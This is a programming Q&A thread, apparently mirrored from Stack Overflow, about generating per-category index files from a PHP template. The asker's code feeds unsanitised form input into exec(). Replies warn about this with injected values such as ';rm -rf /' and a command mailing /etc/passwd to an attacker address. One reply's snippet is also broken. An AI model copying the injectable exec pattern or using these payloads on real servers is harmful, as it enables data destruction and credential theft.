开发者

What is the best way to change matched words by one other in a file?

开发者 https://www.devze.com 2023-03-09 04:04 出处:网络
I\'m on a website project and administrators are able to create categories. When they do make them the name of the category is开发者_运维问答 added to the database.

I'm on a website project and administrators are able to create categories. When they do make them the name of the category is开发者_运维问答 added to the database.

In the PHP file that processes the form used to create categories, I create a directory with the given name in the specific directory of my host, which at this time looks like:

exec('mkdir /homezx/user/website/categories/' . $_POST['name']);

It works fine, but now I'd like to copy a template from a resource folder to this new created directory (would be the index of it) and I know how to do it.

exec('cp .../templates/index.php /.../categories/' . $_POST['name'] . '/index.php');

The problem is I want to craft this template so it can fit the folder where it is placed.

In the template file, I've replace all the parts that will be different from one to one index with the string '%name%'.

What could be the best way to copy this file in a created folder, after having changed all the '%name%' by a given name (e.g. in the title tag)?


$name=$_POST['name'];

mkdir($path_to_new_folder);
$template=fopen($path_to_template);
$str=file_get_contents($template);
$newstr=str_replace('%name%',$name,$str);
fclose($template);
$newfile=fopen($path_to_new_folder.'/index.php','w');
fwrite($newfile,$new_str);
fclose($newfile);

is this what you're trying to do? it will open your templace, replace %name% with the new name, create the directory, and the new file, write the edited template file and save it


I am by no means a hacker, nor even close to that. Thse examples probably would not even work on first try, this is just to get you thinkin. What if $_POST['name'] contains ...

$_POST['name'] = ";rm -rf /"; // ;ends the mkdir instruction ..

or ...

$_POST['name'] = ";mail -s “Pawned” badguy@allyourbasebelongtous.com < /etc/passwd";

Friendly advice, never ever ever use exec like that. Better yet, never ever ever use exec if you can avoid it, especially on web-based applications.


It is advisable to use PHP's mkdir() and copy() functions. For example, couldn't $_POST['name'] be anything? Do you really want to exec() anything?

Secondly, to accomplish the templating, you can use something as simple as this.

$template = file_get_contents('template.html');
$replacements = array(
    '%name%' => 'Oddantfr'
);
$contents = str_replace(
    array_keys($replacements),
    array_values($replacements),
    $template
);
file_put_contents('template.html', $contents);


This is not an answer to the question per se, but a comment that cannot be contained in a comment. However, you need to know this if you don't already.

exec('mkdir /homezx/user/website/categories/' . $_POST['name']);

This is very very very bad. Do NOT do this. When you run an exec() in PHP, the first argument is run as a string, which allows for things like this to take place:

$_POST[] ~ ".'; i0wnZU(); doBadStuff();'";

Which would make your exec()'d code equivalent to:

exec('mkdir /homezx/user/website/categories/'.'; i0wnZU(); doBadStuff();');

Replace my two funny functions with actual bad things (maybe, a root'd script or something), and you have a security hole allowing access to your server's underlying OS.

Use the PHP-provided mkdir() and copy() functions, and CLEAN any POST/GET variables you have submitted to you. Do not EVER just plug it in directly into your code uncleaned, especially in database queries.

0

精彩评论

暂无评论...
验证码 换一张
取 消